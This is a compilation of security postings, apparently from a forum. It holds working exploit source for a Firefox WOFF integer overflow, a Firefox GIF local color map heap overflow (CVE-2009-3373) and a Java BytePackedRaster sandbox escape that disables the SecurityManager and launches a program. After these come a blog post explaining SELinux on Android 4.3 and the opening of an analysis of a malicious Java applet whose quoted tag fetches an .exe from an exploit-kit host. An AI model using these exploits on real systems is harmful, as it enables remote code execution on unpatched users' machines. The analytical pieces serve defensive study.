// 1) calculation result is 0, it's bypass to sanityCheck() function // 2) passed very long length into zlib Decompressor, it's trigger memory corruption! // 0xFFFFFFFD-0xFFFFFFFF: bypass sanityCheck() // you can use only the value of 0xFFFFFFFF ( integer overflow!!! ) // you can't using other values to bypass validation condition woff_dir[0].origLength = 0xFFFFFFFF; // 0xFFFFFFFF ( B.E ) printf("WOFF_HEADER [ %d bytes ]\n", sizeof(WOFF_HEADER)); printf("WOFF_DIRECTORY [ %d bytes ]\n", sizeof(WOFF_DIRECTORY)); // to compress data block // [ 0x0c0c0c0c 0x0c0c0c0c 0x0c0c0c0c ... ] // ...JIT spray stuff... addr_saved_ret_val = plat[n].addr; addr_saved_ret_val += 0x8; // If add 8bytes it reduced reference error occurs for(i = 0; i < sizeof(dataBlock); i+=4) // 0x004E18F5 { dataBlock[i+0] = (addr_saved_ret_val & 0x000000ff); dataBlock[i+1] = (addr_saved_ret_val & 0x0000ff00) >> 8; dataBlock[i+2] = (addr_saved_ret_val & 0x00ff0000) >> 16; dataBlock[i+3] = (addr_saved_ret_val & 0xff000000) >> 24; } // compress dataBlock with zlib's compress() if(compress((Bytef *)compressed_dataBlock, (uLongf *)&destLen, (Bytef *)dataBlock, (uLong)(sizeof(dataBlock)) ) != Z_OK) { fprintf(stderr, "Zlib compress failed!\n"); exit(-1); } printf("\nZlib compress(dataBlock) ...\n"); printf("DataBlock [ %u bytes ]\n", sizeof(dataBlock)); printf("Compressed DataBlock [ %u bytes ]\n", destLen); printf("[ Z_OK ]\n\n"); total_bytes = sizeof(WOFF_HEADER) + sizeof(WOFF_DIRECTORY) + destLen; total_dataBlock = destLen; printf("Total WOFF File Size: %d bytes\n", total_bytes); // byte order change to total_bytes, total_dataBlock ( L.E into B.E ) total_bytes = ((total_bytes & 0xff000000) >> 24) | ((total_bytes & 0x00ff0000) >> 8) | ((total_bytes & 0x0000ff00) << 8) | ((total_bytes & 0x000000ff) << 24); woff_header.length = total_bytes; total_dataBlock = ((total_dataBlock & 0xff000000) >> 24) | ((total_dataBlock & 0x00ff0000) >> 8) | ((total_dataBlock & 0x0000ff00) << 8) | ((total_dataBlock & 0x000000ff) 
<< 24); woff_dir[0].compLength = total_dataBlock; // create attack code data if((fp = fopen("s.woff", "wb")) < 0) { fprintf(stderr, "that file to create open failed\n"); exit(-2); } // setup WOFF data store fwrite(&woff_header, 1, sizeof(woff_header), fp); fwrite(&woff_dir[0], 1, sizeof(woff_dir[0]), fp); fwrite(&compressed_dataBlock, 1, destLen, fp); fclose(fp); // zlib extract test ret = uncompress(de_buf, &de_Len, compressed_dataBlock, destLen); if(ret != Z_OK) { switch(ret) { case Z_MEM_ERROR: printf("Z_MEM_ERROR\n"); break; case Z_BUF_ERROR: printf("Z_BUF_ERROR\n"); break; case Z_DATA_ERROR: printf("Z_DATA_ERROR\n"); break; } fprintf(stderr, "Zlib uncompress test failed!\n"); unlink("./s.woff"); exit(-3); } printf("\nZlib uncompress test(compressed_dataBlock) ...\n"); printf("[ Z_OK ]\n\n"); return 0; } /* eof */ Sursa: Mozilla Firefox 3.6 - Integer Overflow Exploit
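The arithmetic behind the bug is worth isolating. Below is a minimal sketch in Python with explicit 32-bit masking; `padded_len` is an invented name, and the check described in the comments paraphrases the kind of size sanity check a WOFF parser performs, not Firefox's actual code. It shows why origLength = 0xFFFFFFFF slips through validation yet still reaches zlib as an enormous output length:

```python
MASK32 = 0xFFFFFFFF  # emulate 32-bit unsigned arithmetic

def padded_len(orig_length):
    # Round a table's origLength up to a 4-byte boundary, as a WOFF
    # parser does when reconstructing the sfnt size. In 32-bit
    # arithmetic the addition wraps around.
    return ((orig_length + 3) & ~3) & MASK32

orig_length = 0xFFFFFFFF
print(hex(padded_len(orig_length)))  # 0x0 -- wrapped to zero
# A check of the form "sum of padded table lengths <= totalSfntSize"
# now passes trivially, yet the decompressor is still asked to
# inflate 0xFFFFFFFF bytes into a small buffer.
```

This is why the comments above insist that only values near 0xFFFFFFFF work: smaller values do not wrap the padded sum to something that passes the check.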
12. Mozilla Firefox 3.5.4 - Local Color Map Exploit

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
   x90c local color map 1day exploit

   CVE-2009-3373
   Firefox local color map 1day exploit
   (MFSA 2009-56 Firefox local color map parsing heap overflow)

   Full Exploit: http://www.exploit-db.com/sploits/27699.tgz

   vulnerable:
     - Firefox 3.5.4 <=
     - Firefox 3.0.15 <=
     - SeaMonkey 2.0 <=

   x90c
*/

struct _IMAGE {
    char GCT_size;            // global color map size
    char Background;          // backcolor ( selects a global color map entry )
    char default_pixel_ratio; // 00
    char gct[4][3];           // 4 entries of global color map ( 1bit/1pixel )
    // char app_ext[19];      // application extension, 19 bytes ( to enable animation )
    char gce[2];              // '!' GCE Label = F9
    char ext_data;            // 04 = 4 bytes of extension data
    char trans_color_ind;     // use transparent color? ( 0/1 )
    char ani_delay[2];        // 00 00 ( animation delay )
    char trans;               // color map entry to apply transparent color ( applied to first image )
    char terminator1;         // 0x00
    char image_desc;          // ','
    char NW_corner[4];        // 00 00 00 00 (0, 0) image put position
    char canvas_size[4];      // 03 00 05 00 ( 3x5 ) logical canvas size
    char local_colormap;      // 80 use local color map? ( bottom 3 bits are bits per pixel )
    char lct[4][3];           // local color map ( table )
    char LZW_min;             // 02 ( LZW data length - 1 )
    char encoded_image_size;  // 03 ( LZW data length )
    char image_data[1];       // LZW encoded image data
    char terminator2;         // 0x00
} IMAGE;

struct _IMAGE1 {
    char image_desc;          // ','
    char NW_corner[4];        // 00 00 00 00 (0, 0)
    char canvas_size[4];      // 03 00 05 00 ( 3x5 )
    char local_colormap;      // 00 = no local color map
    char lct[7][3];           // local color map
    char lcta[1][2];
    // char LZW_min;             // 08
    // char encoded_image_size;  // 0B ( 11 bytes )
    // char image_data[9];       // encoded image data
    // char terminator2;         // 0x00
} IMAGE1;

struct _GIF_HEADER {
    char MAGIC[6];                // GIF89a
    unsigned short canvas_width;  // 03 00
    unsigned short canvas_height; // 05 00
    struct _IMAGE image;
    struct _IMAGE1 image1;
    // char trailler;             // ';' GIF file trailer
} GIF_HEADER;

int main(int argc, char *argv[])
{
    struct _GIF_HEADER gif_header;
    int i = 0;

    // (1) first image frame's LZW data, a proper dummy ( it can't draw a graphic )
    // char data[3] = "\x84\x8F\x59";
    char data[3] = "\x00\x00\x00";

    // (2) second image frame's LZW data, backcolor changed by referencing the local color map
    char data1[9] = "\x84\x8F\x59\x84\x8F\x59\x84\x8F\x59";

    char app_ext[19] = "\x21\xFF\x0B\x4E\x45\x54\x53\x43\x41\x50\x45\x32\x2E\x30\x03\x01\x00\x00\x00"; // animation tag ( not used )

    FILE *fp;

    memset(&gif_header, 0, sizeof(gif_header));

    // MAGIC ( GIF89a ) latest version - supports alpha value (transparency)
    gif_header.MAGIC[0] = '\x47';
    gif_header.MAGIC[1] = '\x49';
    gif_header.MAGIC[2] = '\x46';
    gif_header.MAGIC[3] = '\x38';
    gif_header.MAGIC[4] = '\x39';
    gif_header.MAGIC[5] = '\x61';

    // LOGICAL CANVAS
    gif_header.canvas_width  = 3;  // global canvas width
    gif_header.canvas_height = 5;  // height

    // GLOBAL HEADER ( if a local color map exists, the global color map is not used )
    gif_header.image.GCT_size = '\x81';             // 81
    gif_header.image.Background = '\x00';           // global color table #2 ( black )
    gif_header.image.default_pixel_ratio = '\x00';  // 00 ( default pixel aspect ratio )

    // gct ( [200][3] )
    gif_header.image.gct[0][0] = '\x43';
    gif_header.image.gct[0][1] = '\x43';
    gif_header.image.gct[0][2] = '\x43';
    gif_header.image.gct[1][0] = '\x43';
    gif_header.image.gct[1][1] = '\x43';
    gif_header.image.gct[1][2] = '\x43';
    gif_header.image.gct[2][0] = '\x43';
    gif_header.image.gct[2][1] = '\x43';
    gif_header.image.gct[2][2] = '\x43';
    gif_header.image.gct[3][0] = '\x43';
    gif_header.image.gct[3][1] = '\x43';
    gif_header.image.gct[3][2] = '\x43';

    /* for(i = 0; i < 19; i++)
    {
        gif_header.image.app_ext[i] = app_ext[i];
    } */

    gif_header.image.gce[0] = '!';
    gif_header.image.gce[1] = '\xF9';
    gif_header.image.ext_data = '\x04';
    gif_header.image.trans_color_ind = '\x00';  // no transparent color
    gif_header.image.ani_delay[0] = '\x00';     // C8 = 2 seconds delay ( animation )
    gif_header.image.ani_delay[1] = '\x00';
    gif_header.image.trans = '\x00';            // no transparent color ( color map )
    gif_header.image.terminator1 = '\x00';

    // IMAGE Header
    gif_header.image.image_desc = ',';
    gif_header.image.NW_corner[0] = '\x00';     // 0,0 position
    gif_header.image.NW_corner[1] = '\x00';
    gif_header.image.NW_corner[2] = '\x00';
    gif_header.image.NW_corner[3] = '\x00';
    gif_header.image.canvas_size[0] = '\x03';   // 3 x 5 canvas
    gif_header.image.canvas_size[1] = '\x00';
    gif_header.image.canvas_size[2] = '\x05';
    gif_header.image.canvas_size[3] = '\x00';

    gif_header.image.local_colormap = 0x80;     // use local color map
    // gif_header.image.local_colormap |= 0x40; // image formatted in Interlaced order
    // gif_header.image.local_colormap |= 0x4;  // pixels of local color map
    // gif_header.image.local_colormap |= 0x2;  // 2 bits.
    gif_header.image.local_colormap |= 0x1;     // bits per pixel ( black/white )

    gif_header.image.lct[0][0] = '\x42';        // R ( red )
    gif_header.image.lct[0][1] = '\x42';
    gif_header.image.lct[0][2] = '\x42';
    gif_header.image.lct[1][0] = '\x42';
    gif_header.image.lct[1][1] = '\x42';        // G ( green )
    gif_header.image.lct[1][2] = '\x42';        // B ( blue )
    gif_header.image.lct[2][0] = '\x42';
    gif_header.image.lct[2][1] = '\x42';
    gif_header.image.lct[2][2] = '\x42';
    gif_header.image.lct[3][0] = '\x42';
    gif_header.image.lct[3][1] = '\x42';
    gif_header.image.lct[3][2] = '\x42';

    // RASTER DATA
    gif_header.image.LZW_min = '\x00';           // total encoded data - 1
    gif_header.image.encoded_image_size = '\x01'; // 255 bytes

    // encoded data
    for(i = 0; i < 1; i++)
    {
        gif_header.image.image_data[i] = '\xFF';
    }

    // RASTER DATA EOF
    gif_header.image.terminator2 = '\x00';

    // --------------------------------------------------
    // ------------- IMAGE1 -----------------------------
    gif_header.image1.image_desc = ',';
    gif_header.image1.NW_corner[0] = '\x00';    // (0, 0)
    gif_header.image1.NW_corner[1] = '\x00';
    gif_header.image1.NW_corner[2] = '\x00';
    gif_header.image1.NW_corner[3] = '\x00';
    gif_header.image1.canvas_size[0] = '\x03';  // 3 x 5
    gif_header.image1.canvas_size[1] = '\x00';
    gif_header.image1.canvas_size[2] = '\x05';
    gif_header.image1.canvas_size[3] = '\x00';

    gif_header.image1.local_colormap = 0x80;     // use local color map
    // gif_header.image1.local_colormap |= 0x40; // image formatted in Interlaced order
    // gif_header.image1.local_colormap |= 0x4;  // 4 pixels of local color map
    gif_header.image1.local_colormap |= 0x2;
    // gif_header.image1.local_colormap |= 0x1;  // 1 bit per pixel

    // the values below will be used as the return address
    for(i = 0; i < 7; i++)  // second image frame's local color map entry length is 8
    {
        gif_header.image1.lct[i][0] = '\x0c';   // (RET & 0x00FF0000)
        gif_header.image1.lct[i][1] = '\x0c';   // (RET & 0xFF00FF00)
        gif_header.image1.lct[i][2] = '\x0c';   // (RET & 0X000000FF)
    }
    gif_header.image1.lcta[0][0] = '\x0c';
    gif_header.image1.lcta[0][1] = '\x0c';

    // RASTER DATA
    // gif_header.image1.LZW_min = 0x00;            // '\x05';
    // gif_header.image1.encoded_image_size = 0x00; // '\x06';

    // encoded data
    /* for(i = 0; i < 9; i++)
    {
        gif_header.image1.image_data[i] = data1[i];
    } */

    // RASTER DATA
    // second image frame's last byte is ignored ( null terminator, GIF total trailer )
    // gif_header.image1.terminator2 = '\x00';
    // gif_header.trailler = ';';
    // --------------------------------------------------

    fp = fopen("a.gif", "wb");
    printf("%d\n", (int)sizeof(struct _GIF_HEADER));
    fwrite(&gif_header, sizeof(struct _GIF_HEADER) - 1, 1, fp);
    fclose(fp);

    system("xxd ./a.gif");

    return 0;
}

Source: Mozilla Firefox 3.5.4 - Local Color Map Exploit
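For readers who want to poke at the container without the C structs, the fixed 13-byte header that the exploit hand-assembles field by field can be sketched in a few lines (Python; the helper name and argument layout are mine, but the byte order follows the GIF89a layout used above):

```python
import struct

def gif_header(width, height, gct_flags):
    # GIF89a signature followed by the logical screen descriptor:
    # width and height as little-endian u16, a packed flags byte,
    # the background color index, and the pixel aspect ratio.
    return (b"GIF89a"
            + struct.pack("<HH", width, height)
            + bytes([gct_flags, 0x00, 0x00]))

# 0x81 = global color table present (bit 7) | 1 bit per pixel (low bits),
# matching GCT_size = '\x81' in the exploit above.
hdr = gif_header(3, 5, 0x81)
print(hdr[:6])   # b'GIF89a'
print(len(hdr))  # 13
```

Dumping such a minimal file next to the exploit's `xxd ./a.gif` output makes it easy to see which bytes the malformed local color map adds.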
13. Packet Storm Exploit 2013-0819-1 - Oracle Java BytePackedRaster.verify() Signed Integer Overflow

Site: packetstormsecurity.com

The BytePackedRaster.verify() method in Oracle Java versions prior to 7u25 is vulnerable to a signed integer overflow that allows bypassing of "dataBitOffset" boundary checks. This exploit code demonstrates remote code execution by popping calc.exe. It was obtained through the Packet Storm Bug Bounty program.

import java.awt.CompositeContext;
import java.awt.image.*;
import java.awt.color.*;
import java.beans.Statement;
import java.security.*;

public class MyJApplet extends javax.swing.JApplet {

    /**
     * Initializes the applet myJApplet
     */
    @Override
    public void init() {
        /* Set the Nimbus look and feel */
        //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) ">
        /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.
         * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html */
        try {
            for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {
                if ("Nimbus".equals(info.getName())) {
                    javax.swing.UIManager.setLookAndFeel(info.getClassName());
                    break;
                }
            }
        } catch (ClassNotFoundException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (InstantiationException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (IllegalAccessException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (javax.swing.UnsupportedLookAndFeelException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        }
        //</editor-fold>

        /* Create and display the applet */
        try {
            java.awt.EventQueue.invokeAndWait(new Runnable() {
                public void run() {
                    initComponents();
                    // print environment info
                    logAdd(
                        "JRE: " + System.getProperty("java.vendor") + " " + System.getProperty("java.version") +
                        "\nJVM: " + System.getProperty("java.vm.vendor") + " " + System.getProperty("java.vm.version") +
                        "\nJava Plug-in: " + System.getProperty("javaplugin.version") +
                        "\nOS: " + System.getProperty("os.name") + " " + System.getProperty("os.arch") +
                        " (" + System.getProperty("os.version") + ")"
                    );
                }
            });
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }

    public void logAdd(String str) {
        txtArea.setText(txtArea.getText() + str + "\n");
    }

    public void logAdd(Object o, String... str) {
        logAdd((str.length > 0 ? str[0] : "") + (o == null ? "null" : o.toString()));
    }

    public String errToStr(Throwable t) {
        String str = "Error: " + t.toString();
        StackTraceElement[] ste = t.getStackTrace();
        for (int i = 0; i < ste.length; i++) {
            str += "\n\t" + ste[i].toString();
        }
        t = t.getCause();
        if (t != null) str += "\nCaused by: " + errToStr(t);
        return str;
    }

    public void logError(Exception ex) {
        logAdd(errToStr(ex));
    }

    public static String toHex(int i) {
        return Integer.toHexString(i);
    }

    /**
     * This method is called from within the init() method to initialize the
     * form. WARNING: Do NOT modify this code. The content of this method is
     * always regenerated by the Form Editor.
     */
    @SuppressWarnings("unchecked")
    // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
    private void initComponents() {
        btnStart = new javax.swing.JButton();
        jScrollPane2 = new javax.swing.JScrollPane();
        txtArea = new javax.swing.JTextArea();

        btnStart.setText("Run calculator");
        btnStart.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mousePressed(java.awt.event.MouseEvent evt) {
                btnStartMousePressed(evt);
            }
        });

        txtArea.setEditable(false);
        txtArea.setColumns(20);
        txtArea.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N
        txtArea.setRows(5);
        txtArea.setTabSize(4);
        jScrollPane2.setViewportView(txtArea);

        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(layout.createSequentialGroup()
                .addContainerGap()
                .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE)
                .addContainerGap())
            .addGroup(layout.createSequentialGroup()
                .addGap(242, 242, 242)
                .addComponent(btnStart, javax.swing.GroupLayout.PREFERRED_SIZE, 124, javax.swing.GroupLayout.PREFERRED_SIZE)
                .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup()
                .addContainerGap()
                .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 344, Short.MAX_VALUE)
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
                .addComponent(btnStart)
                .addContainerGap())
        );
    }// </editor-fold>//GEN-END:initComponents

    private boolean _isMac = System.getProperty("os.name","").contains("Mac");
    private boolean _is64 = System.getProperty("os.arch","").contains("64");

    private int tryExpl() {
        try {
            // alloc aux vars
            String name = "setSecurityManager";
            Object[] o1 = new Object[1];
            Object o2 = new Statement(System.class, name, o1); // make a dummy call for init

            // allocate byte buffer for destination Raster
            DataBufferByte dst = new DataBufferByte(9);
            // allocate the target array right after dst[]
            int[] a = new int[8];
            // allocate an object array right after a[]
            Object[] oo = new Object[7];
            // create Statement with the restricted AccessControlContext
            oo[2] = new Statement(System.class, name, o1);
            // create powerful AccessControlContext
            Permissions ps = new Permissions();
            ps.add(new AllPermission());
            oo[3] = new AccessControlContext(
                new ProtectionDomain[]{
                    new ProtectionDomain(
                        new CodeSource(
                            new java.net.URL("file:///"),
                            new java.security.cert.Certificate[0]
                        ),
                        ps
                    )
                }
            );
            // store System.class pointer in oo[]
            oo[4] = ((Statement)oo[2]).getTarget();

            // save old a.length
            int oldLen = a.length;
            logAdd("a.length = 0x" + toHex(oldLen));

            // prepare source buffer
            DataBufferByte src = new DataBufferByte(8);
            for (int i = 0; i < 8; i++) src.setElem(i, -1);

            // create normal source raster
            MultiPixelPackedSampleModel sm1 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,1,1,4,0);
            WritableRaster wr1 = Raster.createWritableRaster(sm1, src, null);

            // create MultiPixelPackedSampleModel with malformed "scanlineStride" and "dataBitOffset" fields
            MultiPixelPackedSampleModel sm2 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,2,1,
                0x3fffffdd - (_is64 ? 16:0), 288 + (_is64 ? 128:0));
            // create destination BytePackedRaster based on sm2
            WritableRaster wr2 = Raster.createWritableRaster(sm2, dst, null);
            logAdd(wr2);

            // create sun.java2d.SunCompositeContext
            byte[] bb = new byte[] { 0, -1 };
            IndexColorModel cm = new IndexColorModel(1, 2, bb, bb, bb);
            CompositeContext cc = java.awt.AlphaComposite.Src.createContext(cm, cm, null);
            logAdd(cc);

            // call native Java_sun_awt_image_BufImgSurfaceData_initRaster() (see ...\jdk\src\share\native\sun\awt\image\BufImgSurfaceData.c)
            // and native Java_sun_java2d_loops_Blit_Blit() (see ...\jdk\src\share\native\sun\java2d\loops\Blit.c)
            cc.compose(wr1, wr2, wr2);

            // check results: a.length should be overwritten by 0xF8
            int len = a.length;
            logAdd("a.length = 0x" + toHex(len));
            if (len == oldLen) {
                // check a[] content corruption
                // for RnD
                for (int i = 0; i < len; i++)
                    if (a[i] != 0) logAdd("a["+i+"] = 0x" + toHex(a[i]));
                // exit
                logAdd("error 1");
                return 1;
            }

            // ok, now we can read/write outside the real a[] storage,
            // lets find our Statement object and replace its private "acc" field value

            // search for oo[] after a[oldLen]
            boolean found = false;
            int ooLen = oo.length;
            for (int i = oldLen+2; i < oldLen+32; i++)
                if (a[i-1]==ooLen && a[i]==0 && a[i+1]==0       // oo[0]==null && oo[1]==null
                    && a[i+2]!=0 && a[i+3]!=0 && a[i+4]!=0     // oo[2,3,4] != null
                    && a[i+5]==0 && a[i+6]==0)                 // oo[5,6] == null
                {
                    // read pointer from oo[4]
                    int stmTrg = a[i+4];
                    // search for the Statement.target field behind oo[]
                    for (int j = i+7; j < i+7+64; j++) {
                        if (a[j] == stmTrg) {
                            // overwrite default Statement.acc by oo[3] ("AllPermission")
                            a[j-1] = a[i+3];
                            found = true;
                            break;
                        }
                    }
                    if (found) break;
                }

            // check results
            if (!found) {
                // print the memory dump on error
                // for RnD
                String s = "a["+oldLen+"...] = ";
                for (int i = oldLen; i < oldLen+32; i++) s += toHex(a[i]) + ",";
                logAdd(s);
            } else try {
                // show current SecurityManager
                logAdd(System.getSecurityManager(), "Security Manager = ");
                // call System.setSecurityManager(null)
                ((Statement)oo[2]).execute();
                // show results: SecurityManager should be null
                logAdd(System.getSecurityManager(), "Security Manager = ");
            } catch (Exception ex) {
                logError(ex);
            }
            logAdd(System.getSecurityManager() == null ? "Ok.":"Fail.");
        } catch (Exception ex) {
            logError(ex);
        }
        return 0;
    }

    private void btnStartMousePressed(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btnStartMousePressed
        try {
            logAdd("===== Start =====");
            // try several attempts to exploit
            for (int i = 1; i <= 5 && System.getSecurityManager() != null; i++) {
                logAdd("Attempt #" + i);
                tryExpl();
            }
            // check results
            if (System.getSecurityManager() == null) {
                // execute payload
                Runtime.getRuntime().exec(_isMac ? "/Applications/Calculator.app/Contents/MacOS/Calculator":"calc.exe");
            }
            logAdd("===== End =====");
        } catch (Exception ex) {
            logError(ex);
        }
    }//GEN-LAST:event_btnStartMousePressed

    // Variables declaration - do not modify//GEN-BEGIN:variables
    private javax.swing.JButton btnStart;
    private javax.swing.JScrollPane jScrollPane2;
    private javax.swing.JTextArea txtArea;
    // End of variables declaration//GEN-END:variables
}

Download: http://packetstormsecurity.com/files/download/122865/PSA-2013-0819-1-exploit.tgz

Source: Packet Storm Exploit 2013-0819-1 - Oracle Java BytePackedRaster.verify() Signed Integer Overflow - Packet Storm
14. Android 4.3 and SELinux

Stefano Ortolani
Kaspersky Lab Expert
Posted August 17, 18:20 GMT

Not many weeks ago Google released a new revision of its flagship mobile operating system, Android 4.3. Although some say the updates were rather scarce this time, from a security perspective there have been some undeniable improvements (among others, the "MasterKey" vulnerability has finally been patched). One of the most prominent is SELinux. Many cheered the event as a long-awaited move, while others criticized its implementation. Personally, I think the impact is not that easy to assess, especially if we question the benefits for end-users. To shed some light we need to look at what SELinux is and what its threat model is.

Let's start from the basics: the security of any Linux-based system is built upon the concept of Discretionary Access Control (DAC), meaning that each user decides which of his own files are accessed (read, written, or executed) by other users. The system itself is protected from tampering by having all system files owned by the administrative user 'root'. Android is based on the very same concepts, but with a small yet compelling addition: each app is assigned a different user ID (some exceptions are possible though), thereby isolating and protecting the application data from all other applications. This is the reason why, on un-rooted devices, it is quite difficult, if not impossible, for a legitimate application to steal the private data used by another application (unless, obviously, that data is set world-readable).

gattaca Users $ ls -las
total 0
0 drwxr-xr-x   6 root    admin    204 Aug 24  2012 .
0 drwxr-xr-x  31 root    wheel   1122 Aug 16 12:56 ..
0 -rw-r--r--   1 root    wheel      0 Jun 20  2012 .localized
0 drwxr-xr-x+ 11 Guest   _guest   374 Aug 24  2012 Guest
0 drwxrwxrwt   7 root    wheel    238 Apr  9 15:58 Shared
0 drwxr-xr-x+ 87 stefano staff   2958 Aug 11 10:35 stefano

DAC means that access to files and resources is defined in terms of users and file/directory modes. SELinux builds on top of that (and on 15 years of NSA's OS security research) and introduces another security layer termed Mandatory Access Control (MAC). This layer, configured by system-wide policies, further regulates how users (and thus apps on Android devices) access both their own and the system-provided data, all in a transparent manner. In more technical terms, it is possible to design policies that specify which types of interactions a process belonging to a security context can and cannot perform. A simple but effective example is the case of a system log daemon running with root privileges (ouch). With SELinux we can configure the entire system such that the process cannot access anything but the log file: we simply assign a specific label to the log file and write a policy allowing the log daemon to access only files so labeled (as always, consider that things are a bit more complex than that). Note the two advantages coming from this mindset: (1) the policy is enforced system-wide (and even root has to abide by it); (2) the permissions are much more fine-grained than those DAC can enforce.

The ability to limit what the super-user can do (regardless of its privileges) is pivotal to protecting the system from privilege escalation attacks. This is in fact where SELinux excels. Take the case of Gingerbreak, a widespread exploit used to root Gingerbread-based devices. The exploit sends a carefully crafted netlink message to the volume daemon (vold) running as root. Due to some missing bounds checks, that message can lead to successful code injection and execution. Since the process runs as root, it is then trivial to spawn a setuid-root shell and from there take control of the device. SELinux would have stopped that exploit by denying the very same message: the default policy (at least in the original patch-set) denies opening that type of socket, so problem solved. If that were not enough, execution of non-system binaries through that daemon process can be further denied by another SELinux policy.

shell@tilapia:/ # ls -Z /system/
drwxr-xr-x root  root   u:object_r:unlabeled:s0 app
drwxr-xr-x root  shell  u:object_r:unlabeled:s0 bin
drwxr-xr-x root  root   u:object_r:unlabeled:s0 etc
...
Unlabeled FS after OTA update.

Awesome, right? Unfortunately, reality is still quite far from that. The SELinux implementation currently deployed on stock Android 4.3 images is missing several important features. First off, SELinux is configured in Permissive mode only, meaning that policies are not enforced and violations are merely logged (not that useful except for testing). Also, as shown above, the OTA update does not label the system partition correctly (my test device left me puzzled for quite a while until I found that the researcher Pau Oliva had published the exact same finding at DEF CON 21), meaning that a stock restore is mandatory if a developer wants to test it. Finally, besides the fact that the provided policies are anything but restrictive, no MAC is available for the Android middleware (a feature that is part of the NSA's patch-set).

What does all this mean for the end-user, then? Unfortunately, as of now, not much. SELinux as deployed on Android 4.3 can only be tested and its policies developed; there is no safe way to enforce it yet. The ball is now in the OEM vendors' court. Google is strongly encouraging the development of SELinux implementations (BYOD anyone?) based on stock functionality rather than on poorly assembled add-ons (see again the talk given at DEF CON 21 for a comprehensive explanation of what "implementation issues" might mean). Developers, on the other hand, are strongly encouraged to get accustomed to the default set of policies and test their apps for breakage. Will we ever see an Android release with SELinux set to enforcing mode? That we can only hope.

Source: https://www.securelist.com/en/blog/9175/Android_4_3_and_SELinux
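To make the log-daemon example above concrete, a type-enforcement rule of the kind the article describes looks roughly like this (a hypothetical fragment in SELinux policy syntax; the type names are invented for illustration):

```
# Declare a domain for the daemon and a type for its log file
# (hypothetical names).
type logd_t;
type logd_logfile_t;

# Allow the daemon to open and append to files labeled
# logd_logfile_t -- and nothing else. Every access not explicitly
# allowed is denied by default, even for a process running as root.
allow logd_t logd_logfile_t:file { open append getattr };
```

The deny-by-default semantics of the last rule is exactly what would have stopped Gingerbreak: no allow rule for vold's netlink socket, no exploit.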
15. Anti-decompiling techniques in malicious Java Applets

Step 1: How this started

While I was investigating the Trojan.JS.Iframe.aeq case (see blogpost <http://www.securelist.com/en/blog?weblogid=9151>) one of the files dropped by the Exploit Kit was an Applet exploiting a vulnerability:

<script>
document.write('<applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"><param value="http://fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" name="kYtNtcpnx"/></applet>');
</script>

Step 2: First analysis

So basically I unzipped the .jar and took a look using JD-GUI, a Java decompiler. These were the resulting classes inside the .jar file:

The class names are weird, but nothing unusual. Usually the Manifest states the entry point (main class) of the applet. In this case there was no manifest, but we could see this in the applet call from the html:

<applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk">  << Package and Class to execute
<param value="http:// fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S"

The third parameter was the .exe that the applet drops. There was no real need to explore any more deeply just to get an overview of what the applet does. However, the point here was to analyze the vulnerability that this .jar file exploits.

